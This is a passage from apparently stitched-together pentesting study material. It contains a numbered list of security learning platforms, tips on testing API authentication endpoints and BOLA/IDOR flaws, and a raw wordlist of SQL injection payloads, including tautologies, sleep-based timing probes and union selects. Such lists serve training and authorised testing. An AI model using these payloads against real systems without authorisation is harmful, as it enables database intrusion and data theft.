8. Pentester Land — Written Content.
9. Checkmarx — Interactive Learning.
10. Cybrary — Written Content and Labs.
11. RangeForce — Interactive Exercises.
12. Vuln Hub — Written Content and Labs.
13. TCM Security — Interactive Learning.
14. HackXpert — Written Content and Labs.
15. Try Hack Me — Written Content and Labs.
16. OverTheWire — Written Content and Labs.
17. Hack The Box — Written Content and Labs.
18. CyberSecLabs — Written Content and Labs.
19. Pentester Academy — Written Content and Labs.
20. Bug Bounty Reports Explained YouTube — Videos.
Never assume there’s only one way to authenticate to an API! Modern apps have many API endpoints for AuthN: /api/mobile/login | /api/v3/login | /api/magic_link, etc.
Find and test all of them for AuthN problems.
API TIP: 2/10👇🏿✔
SQL injection used to be extremely common 5-10 years ago, and with it you could break into almost every company.
BOLA (IDOR) is the new epidemic of API security.
As a pentester, if you understand how to exploit it, your glory is guaranteed.
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x